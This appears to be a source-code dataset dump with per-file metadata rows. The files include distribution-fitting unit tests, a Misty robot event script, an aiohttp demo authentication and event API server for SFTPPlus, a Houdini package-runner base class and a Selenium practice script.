'dependency': (0, None, 0),
# Shape, Location, Scale
'functions': ('exp3', None, 'power3')
# Shape, Location, Scale
}
# Fit the model to the data, first test a 1D fit.
fit = Fit(sample_hs, dist_description_hs)
# Now perform the 2D fit.
fit = Fit((sample_hs, sample_tz),
(dist_description_hs, dist_description_tz))
dist0 = fit.mul_var_dist.distributions[0]
self.assertGreater(dist0.shape(0), 1) # Should be about 1.5.
self.assertLess(dist0.shape(0), 2)
self.assertIsNone(dist0.loc(0)) # Has no location parameter, should be None.
self.assertGreater(dist0.scale(0), 2) # Should be about 3.
self.assertLess(dist0.scale(0), 4)
self.assertGreater(dist0.shape2(0), 0.5) # Should be about 1.
self.assertLess(dist0.shape2(0), 2)
def test_fit_lnsquare2(self):
"""
Tests a 2D fit that includes an logarithm square dependence function.
"""
sample_hs, sample_tz, label_hs, label_tz = read_benchmark_dataset()
# Define the structure of the probabilistic model that will be fitted to the
# dataset.
dist_description_hs = {'name': 'Weibull_Exp',
'dependency': (None, None, None, None),
# Shape, Location, Scale, Shape2
'width_of_intervals': 0.5}
dist_description_tz = {'name': 'Lognormal_SigmaMu',
'dependency': (0, None, 0),
# Shape, Location, Scale
'functions': ('exp3', None, 'lnsquare2')
# Shape, Location, Scale
}
# Fit the model to the data.
fit = Fit((sample_hs, sample_tz),
(dist_description_hs, dist_description_tz))
# Check whether the logarithmic square fit worked correctly.
dist1 = fit.mul_var_dist.distributions[1]
self.assertGreater(dist1.scale.a, 1) # Should be about 1-5
self.assertLess(dist1.scale.a, 5) # Should be about 1-5
self.assertGreater(dist1.scale.b, 2) # Should be about 2-10
self.assertLess(dist1.scale.b, 10) # Should be about 2-10
self.assertGreater(dist1.scale(0), 0.1)
self.assertLess(dist1.scale(0), 10)
self.assertEqual(dist1.scale.func_name, 'lnsquare2')
def test_fit_powerdecrease3(self):
"""
Tests a 2D fit that includes an powerdecrease3 dependence function.
"""
sample_hs, sample_tz, label_hs, label_tz = read_benchmark_dataset()
# Define the structure of the probabilistic model that will be fitted to the
# dataset.
dist_description_hs = {'name': 'Weibull_Exp',
'dependency': (None, None, None, None),
# Shape, Location, Scale, Shape2
'width_of_intervals': 0.5}
dist_description_tz = {'name': 'Lognormal_SigmaMu',
'dependency': (0, None, 0),
# Shape, Location, Scale
'functions': ('powerdecrease3', None, 'lnsquare2')
# Shape, Location, Scale
}
# Fit the model to the data.
fit = Fit((sample_hs, sample_tz),
(dist_description_hs, dist_description_tz))
# Check whether the logarithmic square fit worked correctly.
dist1 = fit.mul_var_dist.distributions[1]
self.assertGreater(dist1.shape.a, -0.1) # Should be about 0
self.assertLess(dist1.shape.a, 0.1) # Should be about 0
self.assertGreater(dist1.shape.b, 1.5) # Should be about 2-5
self.assertLess(dist1.shape.b, 6) # Should be about 2-10
self.assertGreater(dist1.shape.c, 0.8) # Should be about 1.1
self.assertLess(dist1.shape.c, 2) # Should be about 1.1
self.assertGreater(dist1.shape(0), 0.25) # Should be about 0.35
self.assertLess(dist1.shape(0), 0.4) # Should be about 0.35
self.assertEqual(dist1.shape.func_name, 'powerdecrease3')
def test_fit_asymdecrease3(self):
"""
Tests a 2D fit that includes an asymdecrease3 dependence function.
"""
sample_hs, sample_tz, label_hs, label_tz = read_benchmark_dataset()
# Define the structure of the probabilistic model that will be fitted to the
# dataset.
dist_description_hs = {'name': 'Weibull_Exp',
'dependency': (None, None, None, None),
# Shape, Location, Scale, Shape2
'width_of_intervals': 0.5}
dist_description_tz = {'name': 'Lognormal_SigmaMu',
'dependency': (0, None, 0),
# Shape, Location, Scale
'functions': ('asymdecrease3', None, 'lnsquare2')
# Shape, Location, Scale
}
# Fit the model to the data.
fit = Fit((sample_hs, sample_tz),
(dist_description_hs, dist_description_tz))
# Check whether the logarithmic square fit worked correctly.
dist1 = fit.mul_var_dist.distributions[1]
self.assertAlmostEqual(dist1.shape.a, 0, delta=0.1) # Should be about 0
self.assertAlmostEqual(dist1.shape.b, 0.35, delta=0.4) # Should be about 0.35
self.assertAlmostEqual(np.abs(dist1.shape.c), 0.45, delta=0.2) # Should be about 0.45
self.assertAlmostEquals(dist1.shape(0), 0.35, delta=0.2) # Should be about 0.35
def test_min_number_datapoints_for_fit(self):
"""
Tests if the minimum number of datapoints required for a fit works.
"""
sample_hs, sample_tz, label_hs, label_tz = read_benchmark_dataset()
# Define the structure of the probabilistic model that will be fitted to the
# dataset.
dist_description_hs = {'name': 'Weibull_Exp',
'dependency': (None, None, None, None),
# Shape, Location, Scale, Shape2
'width_of_intervals': 0.5}
dist_description_tz = {'name': 'Lognormal_SigmaMu',
'dependency': (0, None, 0),
# Shape, Location, Scale
'functions': ('exp3', None, 'lnsquare2'),
# Shape, Location, Scale
'min_datapoints_for_fit': 10
}
# Fit the model to the data.
fit = Fit((sample_hs, sample_tz),
(dist_description_hs, dist_description_tz))
# Check whether the logarithmic square fit worked correctly.
dist1 = fit.mul_var_dist.distributions[1]
a_min_10 = dist1.scale.a
# Now require more datapoints for a fit.
dist_description_tz = {'name': 'Lognormal_SigmaMu',
'dependency': (0, None, 0),
# Shape, Location, Scale
'functions': ('exp3', None, 'lnsquare2'),
# Shape, Location, Scale
'min_datapoints_for_fit': 500
}
# Fit the model to the data.
fit = Fit((sample_hs, sample_tz),
(dist_description_hs, dist_description_tz))
# Check whether the logarithmic square fit worked correctly.
dist1 = fit.mul_var_dist.distributions[1]
a_min_500 = dist1.scale.a
# Because in case 2 fewer bins have been used we should get different
# coefficients for the dependence function.
self.assertNotEqual(a_min_10, a_min_500)
def test_multi_processing(selfs):
"""
2-d Fit with multiprocessing (specified by setting a value for timeout)
"""
# Define a sample and a fit.
prng = np.random.RandomState(42)
sample_1 = prng.weibull(1.5, 1000)*3
sample_2 = [0.1 + 1.5 * np.exp(0.2 * point) +
prng.lognormal(2, 0.2) for point in sample_1]
dist_description_0 = {'name': 'Weibull',
'dependency': (None, None, None),
'width_of_intervals': 2}
dist_description_1 = {'name': 'Lognormal',
'dependency': (None, None, 0),
'functions': (None, None, 'exp3')}
# Compute the fit.
my_fit = Fit((sample_1, sample_2),
(dist_description_0, dist_description_1),
timeout=10)
def test_wbl_fit_with_negative_location(self):
"""
Tests fitting a translated Weibull distribution which would result
in a negative location parameter.
"""
sample_hs, sample_tz, label_hs, label_tz = read_benchmark_dataset()
# Define the structure of the probabilistic model that will be fitted to the
# dataset.
dist_description_hs = {'name': 'Weibull_3p',
'dependency': (None, None, None)}
# Fit the model to the data.
fit = Fit((sample_hs, ),
(dist_description_hs, ))
# Correct values for 10 years of data can be found in
# 10.1115/OMAE2019-96523 . Here we used 1 year of data.
dist0 = fit.mul_var_dist.distributions[0]
self.assertAlmostEqual(dist0.shape(0) / 10, 1.48 / 10, places=1)
self.assertGreater(dist0.loc(0), 0.0) # Should be 0.0981
self.assertLess(dist0.loc(0), 0.3) # Should be 0.0981
self.assertAlmostEqual(dist0.scale(0), 0.944, places=1)
# Shift the wave data with -1 m and fit again.
sample_hs = sample_hs - 2
# Negative location values will be set to zero instead and a
# warning will be raised.
with self.assertWarns(RuntimeWarning):
fit = Fit((sample_hs, ),
(dist_description_hs, ))
dist0 = fit.mul_var_dist.distributions[0]
self.assertAlmostEqual(dist0.shape(0) / 10, 1.48 / 10, places=1)
# Should be estimated to be 0.0981 - 2 and corrected to be 0.
self.assertEqual(dist0.loc(0), 0)
self.assertAlmostEqual(dist0.scale(0), 0.944, places=1)
def test_omae2020_wind_wave_model(self):
"""
Tests fitting the wind-wave model that was used in the publication
'Global hierarchical models for wind and wave contours' on dataset D.
"""
sample_v, sample_hs, label_v, label_hs = read_benchmark_dataset(path='tests/testfiles/1year_dataset_D.txt')
# Define the structure of the probabilistic model that will be fitted to the
# dataset.
dist_description_v = {'name': 'Weibull_Exp',
'dependency': (None, None, None, None),
'width_of_intervals': 2}
dist_description_hs = {'name': 'Weibull_Exp',
'fixed_parameters' : (None, None, None, 5), # shape, location, scale, shape2
'dependency': (0, None, 0, None), # shape, location, scale, shape2
'functions': ('logistics4', None, 'alpha3', None), # shape, location, scale, shape2
'min_datapoints_for_fit': 20}
# Fit the model to the data.
fit = Fit((sample_v, sample_hs),
(dist_description_v, dist_description_hs))
dist0 = fit.mul_var_dist.distributions[0]
self.assertAlmostEqual(dist0.shape(0), 2.42, delta=1)
self.assertAlmostEqual(dist0.scale(0), 10.0, delta=2)
self.assertAlmostEqual(dist0.shape2(0), 0.761, delta=0.5)
dist1 = fit.mul_var_dist.distributions[1]
self.assertEqual(dist1.shape2(0), 5)
inspection_data1 = fit.multiple_fit_inspection_data[1]
self.assertEqual(inspection_data1.shape2_value[0], 5)
self.assertAlmostEqual(inspection_data1.shape_value[0], 0.8, delta=0.5) # interval centered at 1
self.assertAlmostEqual(inspection_data1.shape_value[4], 1.5, delta=0.5) # interval centered at 9
self.assertAlmostEqual(inspection_data1.shape_value[9], 2.5, delta=1) # interval centered at 19
self.assertAlmostEqual(dist1.shape(0), 0.8, delta=0.3)
self.assertAlmostEqual(dist1.shape(10), 1.6, delta=0.5)
self.assertAlmostEqual(dist1.shape(20), 2.3, delta=0.7)
self.assertAlmostEqual(dist1.shape.a, 0.582, delta=0.5)
self.assertAlmostEqual(dist1.shape.b, 1.90, delta=1)
self.assertAlmostEqual(dist1.shape.c, 0.248, delta=0.5)
self.assertAlmostEqual(dist1.shape.d, 8.49, delta=5)
self.assertAlmostEqual(inspection_data1.scale_value[0], 0.15, delta=0.2) # interval centered at 1
self.assertAlmostEqual(inspection_data1.scale_value[4], 1, delta=0.5) # interval centered at 9
self.assertAlmostEqual(inspection_data1.scale_value[9], 4, delta=1) # interval centered at 19
self.assertAlmostEqual(dist1.scale(0), 0.15, delta=0.5)
self.assertAlmostEqual(dist1.scale(10), 1, delta=0.5)
self.assertAlmostEqual(dist1.scale(20), 4, delta=1)
self.assertAlmostEqual(dist1.scale.a, 0.394, delta=0.5)
self.assertAlmostEqual(dist1.scale.b, 0.0178, delta=0.1)
self.assertAlmostEqual(dist1.scale.c, 1.88, delta=0.8)
def test_wrong_model(self):
"""
Tests wheter errors are raised when incorrect fitting models are
specified.
"""
sample_v, sample_hs, label_v, label_hs = read_benchmark_dataset(path='tests/testfiles/1year_dataset_D.txt')
# This structure is incorrect as there is not distribution called 'something'.
dist_description_v = {'name': 'something',
'dependency': (None, None, None, None),
'fixed_parameters': (None, None, None, None), # shape, location, scale, shape2
'width_of_intervals': 2}
with self.assertRaises(ValueError):
# Fit the model to the data.
fit = Fit((sample_v, ),
(dist_description_v, ))
# This structure is incorrect as there is not dependence function called 'something'.
dist_description_v = {'name': 'Weibull_Exp',
'dependency': (None, None, None, None),
'width_of_intervals': 2}
dist_description_hs = {'name': 'Weibull_Exp',
'dependency': (0, None, 0, None), # shape, location, scale, shape2
'functions': ('something', None, 'alpha3', None), # shape, location, scale, shape2
'min_datapoints_for_fit': 20}
with self.assertRaises(ValueError):
# Fit the model to the data.
fit = Fit((sample_v, sample_hs),
(dist_description_v, dist_description_hs))
# This structure is incorrect as there will be only 1 or 2 intervals
# that fit 2000 datapoints.
dist_description_v = {'name': 'Weibull_Exp',
'dependency': (None, None, None, None),
'width_of_intervals': 2}
dist_description_hs = {'name': 'Weibull_Exp',
'dependency': (0, None, 0, None), # shape, location, scale, shape2
'functions': ('logistics4', None, 'alpha3', None), # shape, location, scale, shape2
'min_datapoints_for_fit': 2000}
with self.assertRaises(RuntimeError):
# Fit the model to the data.
fit = Fit((sample_v, sample_hs),
(dist_description_v, dist_description_hs))
# This structure is incorrect as alpha3 is only compatible with
# logistics4 .
dist_description_v = {'name': 'Weibull_Exp',
'dependency': (None, None, None, None),
'width_of_intervals': 2}
dist_description_hs = {'name': 'Weibull_Exp',
'fixed_parameters' : (None, None, None, 5), # shape, location, scale, shape2
'dependency': (0, None, 0, None), # shape, location, scale, shape2
'functions': ('power3', None, 'alpha3', None), # shape, location, scale, shape2
'min_datapoints_for_fit': 20}
with self.assertRaises(TypeError):
# Fit the model to the data.
fit = Fit((sample_v, sample_hs),
(dist_description_v, dist_description_hs))
# This structure is incorrect as only shape2 of an exponentiated Weibull
# distribution can be fixed at the moment.
dist_description_v = {'name': 'Lognormal',
'dependency': (None, None, None, None),
'fixed_parameters': (None, None, 5, None), # shape, location, scale, shape2
'width_of_intervals': 2}
with self.assertRaises(NotImplementedError):
# Fit the model to the data.
fit = Fit((sample_v, ),
(dist_description_v, ))
# This structure is incorrect as only shape2 of an exponentiated Weibull
# distribution can be fixed at the moment.
dist_description_v = {'name': 'Weibull_Exp',
'dependency': (None, None, None, None),
'width_of_intervals': 2}
dist_description_hs = {'name': 'Weibull_Exp',
'fixed_parameters' : (None, None, 5, None), # shape, location, scale, shape2
'dependency': (0, None, 0, None), # shape, location, scale, shape2
'functions': ('logistics4', None, 'alpha3', None), # shape, location, scale, shape2
'min_datapoints_for_fit': 20}
with self.assertRaises(NotImplementedError):
# Fit the model to the data.
fit = Fit((sample_v, sample_hs),
(dist_description_v, dist_description_hs))
def test_weighting_of_dependence_function(self):
"""
Tests if using weights when the dependence function is fitted works
correctly.
"""
sample_v, sample_hs, label_v, label_hs = read_benchmark_dataset(path='tests/testfiles/1year_dataset_D.txt')
# Define the structure of the probabilistic model that will be fitted to the
# dataset.
dist_description_v = {'name': 'Weibull_Exp',
'dependency': (None, None, None, None),
'width_of_intervals': 2}
dist_description_hs = {'name': 'Weibull_Exp',
'fixed_parameters' : (None, None, None, 5), # shape, location, scale, shape2
'dependency': (0, None, 0, None), # shape, location, scale, shape2
'functions': ('logistics4', None, 'alpha3', None), # shape, location, scale, shape2
'min_datapoints_for_fit': 20,
'do_use_weights_for_dependence_function': False}
# Fit the model to the data.
fit = Fit((sample_v, sample_hs),
(dist_description_v, dist_description_hs))
dist1_no_weights = fit.mul_var_dist.distributions[1]
# Now perform a fit with weights.
dist_description_hs = {'name': 'Weibull_Exp',
'fixed_parameters' : (None, None, None, 5), # shape, location, scale, shape2
'dependency': (0, None, 0, None), # shape, location, scale, shape2
'functions': ('logistics4', None, 'alpha3', None), # shape, location, scale, shape2
'min_datapoints_for_fit': 20,
'do_use_weights_for_dependence_function': True}
# Fit the model to the data.
fit = Fit((sample_v, sample_hs),
(dist_description_v, dist_description_hs))
dist1_with_weights = fit.mul_var_dist.distributions[1]
# Make sure the two fitted dependnece functions are different.
d = np.abs(dist1_with_weights.scale(0) - dist1_no_weights.scale(0)) / \
np.abs(dist1_no_weights.scale(0))
self.assertGreater(d, 0.01)
# Make sure they are not too different.
d = np.abs(dist1_with_weights.scale(20) - dist1_no_weights.scale(20)) / \
np.abs(dist1_no_weights.scale(20))
self.assertLess(d, 0.5)
| 46.563847 | 121 | 0.561044 | 3,248 | 28,078 | 4.695197 | 0.103756 | 0.072787 | 0.046033 | 0.040918 | 0.763016 | 0.729639 | 0.683738 | 0.626623 | 0.566295 | 0.546951 | 0 | 0.052405 | 0.337382 | 28,078 | 602 | 122 | 46.641196 | 0.767267 | 0.239511 | 0 | 0.535088 | 0 | 0 | 0.104394 | 0.021705 | 0 | 0 | 0 | 0 | 0.251462 | 1 | 0.038012 | false | 0 | 0.011696 | 0 | 0.055556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
81c08bcad1b73822669737a9c7a8c3b7773030bc | 430 | py | Python | videoclip_sources/e004.py | ChrisScarred/misty2py-skills | 30557d246b91fb525866fe8b92e280d2609ca26b | [
"MIT"
] | null | null | null | videoclip_sources/e004.py | ChrisScarred/misty2py-skills | 30557d246b91fb525866fe8b92e280d2609ca26b | [
"MIT"
] | null | null | null | videoclip_sources/e004.py | ChrisScarred/misty2py-skills | 30557d246b91fb525866fe8b92e280d2609ca26b | [
"MIT"
] | null | null | null | import time
from misty2py.robot import Misty
from misty2py.utils.env_loader import EnvLoader
from misty2py_skills.utils.utils import get_abs_path
env_loader = EnvLoader(get_abs_path(".env"))
m = Misty(env_loader.get_ip())
d = m.event("subscribe", type="BatteryCharge")
e_name = d.get("event_name")
time.sleep(1)
d = m.event("get_data", name=e_name)
# do something with the data here
d = m.event("unsubscribe", name=e_name)
| 21.5 | 52 | 0.755814 | 72 | 430 | 4.319444 | 0.444444 | 0.115756 | 0.067524 | 0.083601 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010526 | 0.116279 | 430 | 19 | 53 | 22.631579 | 0.807895 | 0.072093 | 0 | 0 | 0 | 0 | 0.138539 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.363636 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
81ca35091868d035a8a09d9c9753adadf774b179 | 6,088 | py | Python | api-server.py | proatria/sftpplus-api-example | 1fc3af66beef06d66ad46a0cf74bb0905793cf7f | [
"MIT"
] | null | null | null | api-server.py | proatria/sftpplus-api-example | 1fc3af66beef06d66ad46a0cf74bb0905793cf7f | [
"MIT"
] | null | null | null | api-server.py | proatria/sftpplus-api-example | 1fc3af66beef06d66ad46a0cf74bb0905793cf7f | [
"MIT"
] | null | null | null | """
Run a simple HTTP server which provides API endpoint for SFTPPlus.
Usage:
server.py [options]
-h --help Show this help.
-p --port=8000 Listen to a specific port. [default: 8080]
-a --address=127.0.0.1 Listen on specific address. [default: 0.0.0.0]
-c --certificate=PATH Enable HTTPS by defining the path
to a file containing server key, certificate, and CA chain
all PEM format and stored in a single file.
-f --flaky Introduce random errors to test SFTPPlus API retry functionality.
The following API endpoints are provided:
* /auth-api - For the authentication API
* /event-api - For the event handler API
"""
from __future__ import absolute_import, unicode_literals
import base64
import json
import ssl
from random import randint
from aiohttp import web
from docopt import docopt
# Command line handling part.
arguments = docopt(__doc__)
# Convert arguments to usable types.
port = int(arguments["--port"])
# Need to escape the address for ipv6.
address = arguments["--address"].replace(":", r"\:")
is_flaky = arguments["--flaky"]
certificate = arguments["--certificate"]
# Set to lower values to increase the probability of a failure.
_FLAKY_DEGREE = 3
# DB with accepted accounts.
# Each key is the name of an user.
# Each value contains the accepted password and/or SSH-key.
ACCOUNTS = {
# An account with some custom configuration.
# Configuration that is not explicitly defined here is extracted based on
# the SFTPPlus group.
"test-user": {
"password": "test-pass",
# Just the public key value, in OpenSSH format.
# Without hte key type or comments.
"ssh-public-key": "AAAAB3NzaC1yc2EAAAADAQABAAAAgQC4fV6tSakDSB6ZovygLsf1iC9P3tJHePTKAPkPAWzlu5BRHcmAu0uTjn7GhrpxbjjWMwDVN0Oxzw7teI0OEIVkpnlcyM6L5mGk+X6Lc4+lAfp1YxCR9o9+FXMWSJP32jRwI+4LhWYxnYUldvAO5LDz9QeR0yKimwcjRToF6/jpLw==",
"configuration": {
"home_folder_path": "/tmp",
# EXTRA_DATA is not yet supported.
# 'extra_data': {
# 'file_api_token': 'fav1_some_value',
# },
},
},
# An account with default configuration extracted from
# the default SFTPPlus group.
# SSH-Key authentication is disabled for this user.
"default-user": {
"password": "default-pass",
"ssh-public-key": "",
"configuration": {},
},
}
async def handle_root(request):
return web.Response(text="Demo SFTPPlus API endpoints.")
async def handle_auth(request):
"""
This is triggered for authentication API calls.
"""
request_json = await get_json(request)
print("\n\n")
print("-" * 80)
print("New authentication request received")
print(json.dumps(request_json, indent=2))
if is_flaky and randint(0, _FLAKY_DEGREE) == 0:
print("TRIGGERING AN EMULATED FAILURE")
return web.Response(status=500, text="Failed to process the request")
credentials = request_json["credentials"]
account = ACCOUNTS.get(credentials["username"], None)
if account is None:
# This is not an account handled by this authentication API.
# Inform SFTPPus that it can try to authenticate the user via other
# method (LDAP, or another HTTP authentication server).
print("UNKNOWN USER")
return web.Response(
status=401, text="User not handled by our API. Try other method."
)
response = {"account": account.get("configuration", {})}
if credentials["type"] in ["password", "password-basic-auth"]:
# We have password based authentication.
if credentials["content"] != account["password"]:
print("INVALID PASSWORD")
return web.Response(status=403, text="Password rejected.")
# Valid password.
print("VALID PASSWORD")
return web.json_response(response)
if credentials["type"] == "ssh-key":
# We have SSH-key based authentication.
# The keys are encoded as BASE64, but we compare them as bytes.
if base64.b64decode(credentials["content"]) != base64.b64decode(
account["ssh-public-key"]
):
print("INVALID SSH-KEY")
return web.Response(status=403, text="SSH-Key rejected.")
# Valid SSH key authentication.
print("VALID SSH-KEY")
return web.json_response(response)
return web.Response(status=403, text="Credentials type not supported.")
async def handle_event(request):
"""
This is triggered by the event handler API calls.
"""
print("\n\n")
print("-" * 80)
print("New event handler call")
print("-" * 80)
print("Headers:")
for key, value in request.headers.items():
print(f" {key}: {value}")
print("-" * 80)
print("Payload:")
await get_json(request)
if is_flaky and randint(0, _FLAKY_DEGREE) == 0:
print("TRIGGERING AN EMULATED FAILURE")
return web.Response(status=500, text="Failed to process the request")
# An empty response body can be used to confirm that the event
# was received successfully by the API server.
# This instruct SFTPPlus not to retry.
return web.Response(status=204, text="")
async def get_json(request):
"""
Return the json dict from `request`.
It also logs the JSON
"""
result = {}
try:
result = await request.json()
except json.JSONDecodeError:
print("INVALID JSON RECEIVED")
text = await request.text()
print(text)
result = {}
else:
print(json.dumps(result, indent=2))
return result
app = web.Application()
app.add_routes(
[
web.get("/", handle_root),
web.post("/auth-api", handle_auth),
web.post("/event-api", handle_event),
]
)
ssl_context = None
if certificate:
ssl_context = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)
ssl_context.load_cert_chain(certificate, certificate)
if __name__ == "__main__":
web.run_app(app, host=address, port=port, ssl_context=ssl_context)
| 31.220513 | 233 | 0.655388 | 750 | 6,088 | 5.238667 | 0.330667 | 0.022907 | 0.034614 | 0.040977 | 0.109443 | 0.094681 | 0.071774 | 0.060575 | 0.060575 | 0.060575 | 0 | 0.020869 | 0.236531 | 6,088 | 194 | 234 | 31.381443 | 0.824441 | 0.311597 | 0 | 0.156863 | 0 | 0 | 0.245565 | 0.051698 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.068627 | 0.068627 | 0 | 0.176471 | 0.215686 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
81ceeac6fb9c99499e11e6ba24211d641629642f | 4,355 | py | Python | src/houdini_package_runner/items/base.py | captainhammy/houdini_package_runner | 40f8b60ebe32c64fd9b37328a9a5eefacd1c6ebd | [
"MIT"
] | 3 | 2022-02-06T23:31:17.000Z | 2022-02-07T11:10:03.000Z | src/houdini_package_runner/items/base.py | captainhammy/houdini_package_runner | 40f8b60ebe32c64fd9b37328a9a5eefacd1c6ebd | [
"MIT"
] | null | null | null | src/houdini_package_runner/items/base.py | captainhammy/houdini_package_runner | 40f8b60ebe32c64fd9b37328a9a5eefacd1c6ebd | [
"MIT"
] | null | null | null | """This module contains a base runnable item."""
# =============================================================================
# IMPORTS
# =============================================================================
# Future
from __future__ import annotations
# Standard Library
from abc import ABC, abstractmethod
from typing import TYPE_CHECKING, List
# Imports for type checking.
if TYPE_CHECKING:
import pathlib
import houdini_package_runner.runners.base
# =============================================================================
# CLASSES
# =============================================================================
class BaseItem(ABC):
"""Base class for a runnable item.
:param write_back: Whether the item should write itself back to disk.
"""
def __init__(self, write_back: bool = False) -> None:
self._contents_changed = False
self._ignored_builtins: List[str] = []
self._is_single_line = False
self._is_test_item = False
self._write_back = write_back
def __repr__(self):
return f"<{self.__class__.__name__}>"
# -------------------------------------------------------------------------
# PROPERTIES
# -------------------------------------------------------------------------
@property
def contents_changed(self) -> bool:
"""Whether the contents of the item have changed."""
return self._contents_changed
@contents_changed.setter
def contents_changed(self, contents_changed: bool):
self._contents_changed = contents_changed
# -------------------------------------------------------------------------
@property
def ignored_builtins(self) -> List[str]:
"""A list of known builtins to ignore for checks which look for imports."""
return self._ignored_builtins
# -------------------------------------------------------------------------
@property
def is_single_line(self) -> bool:
"""Whether the item code on a single line."""
return self._is_single_line
# -------------------------------------------------------------------------
@property
def is_test_item(self) -> bool:
"""Whether the item is a test related item."""
return self._is_test_item
@is_test_item.setter
def is_test_item(self, is_test_item: bool):
self._is_test_item = is_test_item
# -------------------------------------------------------------------------
@property
def write_back(self) -> bool:
"""Whether the item should write changes back."""
return self._write_back
@write_back.setter
def write_back(self, write_back):
self._write_back = write_back
# -------------------------------------------------------------------------
# METHODS
# -------------------------------------------------------------------------
@abstractmethod
def process(
self, runner: houdini_package_runner.runners.base.HoudiniPackageRunner
) -> int:
"""Process an item.
:param runner: The package runner processing the item.
:return: The process return code.
"""
class BaseFileItem(BaseItem):
"""Base class for a runnable item.
:param path: The path for the item.
:param write_back: Whether the item should write itself back to disk.
"""
def __init__(self, path: pathlib.Path, write_back: bool = False) -> None:
super().__init__(write_back=write_back)
self._path = path
def __repr__(self):
return f"<{self.__class__.__name__} {self.path}>"
# -------------------------------------------------------------------------
# PROPERTIES
# -------------------------------------------------------------------------
@property
def path(self) -> pathlib.Path:
"""The path on disk."""
return self._path
# -------------------------------------------------------------------------
# METHODS
# -------------------------------------------------------------------------
@abstractmethod
def process(
self, runner: houdini_package_runner.runners.base.HoudiniPackageRunner
) -> int:
"""Process an item.
:param runner: The package runner processing the item.
:return: The process return code.
"""
| 29.828767 | 83 | 0.461538 | 382 | 4,355 | 4.971204 | 0.212042 | 0.07109 | 0.042127 | 0.029489 | 0.52396 | 0.345972 | 0.345972 | 0.293839 | 0.26119 | 0.26119 | 0 | 0 | 0.198852 | 4,355 | 145 | 84 | 30.034483 | 0.544282 | 0.473938 | 0 | 0.321429 | 0 | 0 | 0.030913 | 0.024824 | 0 | 0 | 0 | 0 | 0 | 1 | 0.267857 | false | 0 | 0.089286 | 0.035714 | 0.535714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
81d742485fceccd1810f61f429cd089c6e0b112d | 1,126 | py | Python | test.py | IldusTim/QAStudy | f2f5e9c673259e7e1c8d0ab2887f28326300abe3 | [
"Apache-2.0"
] | null | null | null | test.py | IldusTim/QAStudy | f2f5e9c673259e7e1c8d0ab2887f28326300abe3 | [
"Apache-2.0"
] | null | null | null | test.py | IldusTim/QAStudy | f2f5e9c673259e7e1c8d0ab2887f28326300abe3 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
import math
from selenium.webdriver.support.ui import Select
import os
import time
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
link = "http://suninjuly.github.io/explicit_wait2.html"
opt = webdriver.ChromeOptions()
opt.add_experimental_option('w3c', False)
browser = webdriver.Chrome(chrome_options=opt)
browser.implicitly_wait(5, 0.5)
browser.get(link)
button = browser.find_element_by_id("book")
price = WebDriverWait(browser, 12).until(EC.text_to_be_present_in_element((By.ID, "price"),"10000 RUR"))
button.click()
def calc(x):
return str(math.log(abs(12*math.sin(int(x)))))
browser.find_element_by_class_name("btn-primary").click()
# new_window = browser.window_handles[1]
# browser.switch_to.window(new_window)
x_element = browser.find_element_by_id("input_value")
x = x_element.text
y = calc(x)
browser.find_element_by_id("answer").click()
browser.find_element_by_id("answer").send_keys(y)
browser.find_element_by_id("solve").click() | 31.277778 | 104 | 0.785968 | 174 | 1,126 | 4.867816 | 0.482759 | 0.07438 | 0.127509 | 0.141677 | 0.255018 | 0.151122 | 0 | 0 | 0 | 0 | 0 | 0.015444 | 0.079929 | 1,126 | 36 | 105 | 31.277778 | 0.802124 | 0.086146 | 0 | 0 | 0 | 0 | 0.103314 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0 | 0.307692 | 0.038462 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
81dbffa128ea7c27541a642445edf3ebd5fd3197 | 8,918 | py | Python | os_migrate/plugins/modules/import_workload_create_instance.py | jbadiapa/os-migrate | 19b591a672bc9e4af72e62dbd96be94a238a6dc2 | [
"Apache-2.0"
] | 35 | 2020-01-22T18:38:27.000Z | 2022-03-22T16:19:56.000Z | os_migrate/plugins/modules/import_workload_create_instance.py | jbadiapa/os-migrate | 19b591a672bc9e4af72e62dbd96be94a238a6dc2 | [
"Apache-2.0"
] | 292 | 2019-12-09T11:15:26.000Z | 2022-03-31T14:37:52.000Z | os_migrate/plugins/modules/import_workload_create_instance.py | jbadiapa/os-migrate | 19b591a672bc9e4af72e62dbd96be94a238a6dc2 | [
"Apache-2.0"
] | 32 | 2019-12-09T11:09:44.000Z | 2022-03-24T01:13:31.000Z | #!/usr/bin/python
from __future__ import (absolute_import, division, print_function)
